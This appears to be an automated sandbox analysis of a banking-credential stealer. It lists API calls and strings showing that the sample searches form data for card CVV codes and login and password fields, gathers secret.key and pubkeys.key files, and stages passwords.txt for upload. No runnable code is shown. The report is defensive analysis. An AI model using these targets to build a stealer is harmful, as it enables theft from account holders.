                                                                                                                                                                                                            • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                            • API String ID: 2439004899-2402783461
                                                                                                                                                                                                            • Opcode ID: 5f5ef55772b553a228ab7576bb457e016a8f12ea4f45d8c1d010d5c0f53379cc
                                                                                                                                                                                                            • Instruction ID: 22693621b77a3cfa7a040edd3b326cf8be284b6066337652e35d92e69e80c942
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f5ef55772b553a228ab7576bb457e016a8f12ea4f45d8c1d010d5c0f53379cc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEA1B0B1E40204ABDB619FA4AC5CFAF7F78EF85741F548598FA05AB241DBB09414CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD0830
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C97C), ref: 02BD0857
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD0895
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD089F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD08A7
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD08B9
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD08C0
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BD08FC
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BD090A
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C97C,?,?), ref: 02BD0945
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD097F
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD0989
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD0991
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD09A0
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD09A7
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BD09D5
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD0A00
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD0A4B
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,secret.key,00000104,?,?,?), ref: 02BD0A65
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD0AA8
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002,?,?,?), ref: 02BD0AC2
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,02BFA5BC,00000002,?,?,?), ref: 02BD0AE7
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD0B2A
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,pubkeys.key,00000104,?,secret.key,00000002,?,?,?), ref: 02BD0B44
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0B69
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0BA1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0BA4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0BB0
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0BB3
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?,?,?), ref: 02BD0BC0
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD0BE6
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?), ref: 02BD0C08
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},00000006,00000010,00000000,00000000,00000000,?), ref: 02BD0C23
                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?), ref: 02BD0C2E
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?), ref: 02BD0C39
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?), ref: 02BD0C40
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,?,?), ref: 02BD0C50
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD0C62
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0C8F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0C92
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0C9F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0CA2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0CAB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0CAE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 02BD0CBF
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0CC2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ErrorFreeLastPathSecuritymemset$CreateDescriptorDirectoryFileSleepValidatelstrcpyn$AdminAttributesBackslashFolderHandleMakeMutexSystemUser$CloseConvertCurrentDeleteInfoInformationLocalNamedReleaseSaclString
                                                                                                                                                                                                            • String ID: Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$S:(ML;;NRNWNX;;;LW)$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                            • API String ID: 1233543684-2787241867
                                                                                                                                                                                                            • Opcode ID: 8398757027ca5ef586260ada1c68fa2624c4c75ac0be94274b839a87a6efcfa1
                                                                                                                                                                                                            • Instruction ID: 36bf51d71861ff7cf7ff5a967bd0355aacfd5a82aa4294e23af7c989d0724e21
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8398757027ca5ef586260ada1c68fa2624c4c75ac0be94274b839a87a6efcfa1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04D10170944341AFE760AB74D888FAB7BE8EF89744F444E98F68587140EB74D518CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC89F2
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,02BC0BE3,?,?,?), ref: 02BC8A0F
                                                                                                                                                                                                              • Part of subcall function 02BC4170: GetProcessHeap.KERNEL32(00000008,02BC0BF7,02BC0BE3,?,02BC8A25,?,?,?), ref: 02BC4181
                                                                                                                                                                                                              • Part of subcall function 02BC4170: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 02BC4188
                                                                                                                                                                                                              • Part of subcall function 02BC4170: memset.MSVCRT ref: 02BC4198
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC8A35
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv=,00000000,76F8F380,00000000,00000001,00000000,?,?,?,02BC8A44,?,?,?,?,?), ref: 02BCE433
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE441
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE44D
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE45B
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE467
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE479
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: strstr.MSVCRT ref: 02BCE48F
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: strstr.MSVCRT ref: 02BCE4A2
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02BCE50B
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD44DC
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD44EF
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD4502
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: PathAddBackslashA.SHLWAPI(02C0D2A0), ref: 02BD4528
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: PathAddBackslashA.SHLWAPI(02C0D2A0), ref: 02BD4562
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD45CD
                                                                                                                                                                                                              • Part of subcall function 02BD44A0: GetLastError.KERNEL32 ref: 02BD45D7
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1A83
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1A92
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1AA1
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1ACD
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1B03
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD1B6C
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: GetLastError.KERNEL32 ref: 02BD1B76
                                                                                                                                                                                                              • Part of subcall function 02BD1A60: IsUserAnAdmin.SHELL32 ref: 02BD1B7E
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,j_username=,00000000,00000000,?,?,?,?,?,?), ref: 02BC8A5C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,j_password=,?,?,?,?,?,?), ref: 02BC8A6C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058,?,?,?,?,?,?), ref: 02BC8A9D
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0C058,?,?,?,?,?,?), ref: 02BC8AAB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8AB8
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058,?,?,?,?,?,?), ref: 02BC8ABF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,command=auth_loginByPassword&back_command=&back_custom1=&,?,?,?,?,?,?), ref: 02BC8B2E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C15C,?,?,?,?,?,?), ref: 02BC8B5D
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0C15C,?,?,?,?,?,?), ref: 02BC8B6B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8B78
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C15C,?,?,?,?,?,?), ref: 02BC8B7F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,edClientLogin=,?,?,?,?,?,?), ref: 02BC8BF3
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,edUserLogin=,?,?,?,?,?,?), ref: 02BC8C03
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,edPassword=,?,?,?,?,?,?), ref: 02BC8C13
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C468,?,?,?,?,?,?), ref: 02BC8C3D
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0C468,?,?,?,?,?,?), ref: 02BC8C4B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8C58
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C468,?,?,?,?,?,?), ref: 02BC8C5F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&LOGIN_AUTHORIZATION_CODE=,?,?,?,?,?,?), ref: 02BC8CCF
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C56C,?,?,?,?,?,?), ref: 02BC8CFD
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0C56C,?,?,?,?,?,?), ref: 02BC8D0B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8D18
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C56C,?,?,?,?,?,?), ref: 02BC8D1F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,action=auth&np=&login=,?,?,?,?,?,?), ref: 02BC8D93
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C774,?,?,?,?,?,?), ref: 02BC8DBD
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0C774,?,?,?,?,?,?), ref: 02BC8DCB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C774,?,?,?,?,?,?), ref: 02BC8DD6
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,CryptoPluginId=AGAVA&Sign,?,?,?,?,?,?), ref: 02BC8E43
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CF94,?,?,?,?,?,?), ref: 02BC8E6D
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(00000000,02C0CF94,?,?,?,?,?,?), ref: 02BC8E7B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CF94,?,?,?,?,?,?), ref: 02BC8E86
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD3570,00000000,00000000,00000000), ref: 02BC8EE8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,02BC0BE3,?,?,?,?,?,?), ref: 02BC8F00
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BC8F11
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$strstr$Append$CreateHeap$DirectoryErrorHandleLastProcessmemset$AdminAllocCloseInformationReadThreadUsermemcpy
                                                                                                                                                                                                            • String ID: &LOGIN_AUTHORIZATION_CODE=$CryptoPluginId=AGAVA&Sign$action=auth&np=&login=$command=auth_loginByPassword&back_command=&back_custom1=&$edClientLogin=$edPassword=$edUserLogin=$j_password=$j_username=$pass.log
                                                                                                                                                                                                            • API String ID: 4254156133-1224950822
                                                                                                                                                                                                            • Opcode ID: 9a0e031ef87e9574c74e0cf9dac8ab6dc2b0ad6e18f0e5c79d53400609df9f64
                                                                                                                                                                                                            • Instruction ID: 12e6dfba094bef9b8b3ba6623eb5fd6a4e1f96e30068a62c689d1bb51b4b6ff3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a0e031ef87e9574c74e0cf9dac8ab6dc2b0ad6e18f0e5c79d53400609df9f64
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22D12835A442149BDB229B289C40BEB7FF89F95B40F2485DAEAC597240CFB09945CFE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02BC0981
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC0984
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC099E
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02BC09BE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02BC09DF
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC09E2
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC09F7
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BC0A0D
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02BC0A29
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02BC0A3C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02BC0A4C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC0A4F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0A6A
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02BC0A7D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02BC0AC9
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC0ACC
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0AE0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0AF0
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC0AFE
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BC0B40
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC0B6C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC0B6F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC0B7C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC0B7F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0B8B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC0B8E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0B9B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC0B9E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0BB4
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC0BB7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0BC4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC0BC7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02BC0BE6
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC0BEF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0BF8
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC0BFB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0C07
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC0C0A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC0C13
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC0C16
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                            • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                            • API String ID: 1808236364-2343086565
                                                                                                                                                                                                            • Opcode ID: f9811876acfa94f242b01e795b253783729c826d3f7884f978961fee42805e42
                                                                                                                                                                                                            • Instruction ID: 95b2b1b366c610483722889f4316eaf73a3dfa6d5152170eb198952e3fce1cce
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9811876acfa94f242b01e795b253783729c826d3f7884f978961fee42805e42
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1A1A271D00219AFDB20EF68DC49FAFBBB8EF84754F144588FA44A7280DB709955CBA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 02BC2AAC
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02BC2AC5
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BC2ACC
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02BC2B0B
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02BC2B25
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BC2B2F
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02BC2BA8
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02BC2BCE
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC2BED
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,02BFFB50,00000000), ref: 02BC2C0F
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BC2C2A
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BC2C35
                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02BC2C52
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02BC2C84
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC2C8B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC2C9F
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02BC2D40
                                                                                                                                                                                                            • LockFile.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 02BC2D51
                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 02BC2D61
                                                                                                                                                                                                            • UnlockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 02BC2D72
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC2D7B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC2D82
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC2D8F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC2D96
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,02BFFB50), ref: 02BC2DB1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC2DB4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,02BFFB50), ref: 02BC2DC1
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC2DC4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC2DE1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC2DF3
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB50), ref: 02BC2DFE
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC2E39
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BC2E48
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 02BC2E5B
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BC2E68
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Heap$PathProcess$Security$DescriptorFreePointer$BackslashCreateCriticalFolderHandleLockSectionUnlockValidateWrite$AllocCloseConvertEnterExistsInfoInformationLeaveLocalNamedSaclStringmemset
                                                                                                                                                                                                            • String ID: 69889366a$698893a4a$S:(ML;;NRNWNX;;;LW)$[/pst]$[pst]
                                                                                                                                                                                                            • API String ID: 255608459-3660153349
                                                                                                                                                                                                            • Opcode ID: ef35ca78aa212d3b28078e71e7f92a118c7fbee0865416c366c2b21aeec664db
                                                                                                                                                                                                            • Instruction ID: c5e7883f3412f09b2543eb06d3e3ecbdff9bef7809884d2d5beb4a3abab6140c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef35ca78aa212d3b28078e71e7f92a118c7fbee0865416c366c2b21aeec664db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65C1E231644305AFE7209F249C98FABBBA8EF88744F544A5CFA85DB180DB70D914CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BC3BCA
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC3C72
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BC3C7F
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BC3C85
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BC3CA2
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BC3CB9
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BC3CD6
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?), ref: 02BC3D05
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileVirtual$AllocAttributesBackslashCountDeleteFreePathTick_snprintflstrcpyn
                                                                                                                                                                                                            • String ID: -----------------------------$%s%u.zip$--$-----------------------------$6a52c6225f6f323$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt
                                                                                                                                                                                                            • API String ID: 3203035732-3869958749
                                                                                                                                                                                                            • Opcode ID: c8dec1f8bedc3356354eec1b26ff1207768ec3dc4e0a9ee2a3247eec6552390c
                                                                                                                                                                                                            • Instruction ID: e2428dcd79b507c15aaee88293c68a2192306c01cfc645e497384e1dcd345c56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8dec1f8bedc3356354eec1b26ff1207768ec3dc4e0a9ee2a3247eec6552390c
